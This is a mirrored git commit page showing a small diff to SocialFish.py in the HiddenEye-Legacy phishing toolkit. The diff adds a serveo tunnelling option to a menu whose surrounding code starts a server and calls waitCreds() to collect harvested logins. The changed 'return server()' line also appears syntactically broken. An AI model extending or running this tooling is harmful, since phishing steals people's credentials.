mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Update SocialFish.py
This commit is contained in:
parent
5399be17cd
commit
c67cc1914a
|
@ -330,8 +330,10 @@ if __name__ == "__main__":
|
||||||
choice = input(" \n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
choice = input(" \n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||||
if choice == '1':
|
if choice == '1':
|
||||||
runNgrok()
|
runNgrok()
|
||||||
|
elif choice == '2':
|
||||||
|
serveo()
|
||||||
else:
|
else:
|
||||||
serveo()
|
return server()
|
||||||
server()
|
server()
|
||||||
multiprocessing.Process(target=runServer).start()
|
multiprocessing.Process(target=runServer).start()
|
||||||
waitCreds()
|
waitCreds()
|
||||||
|
|
Loading…
Reference in New Issue
Block a user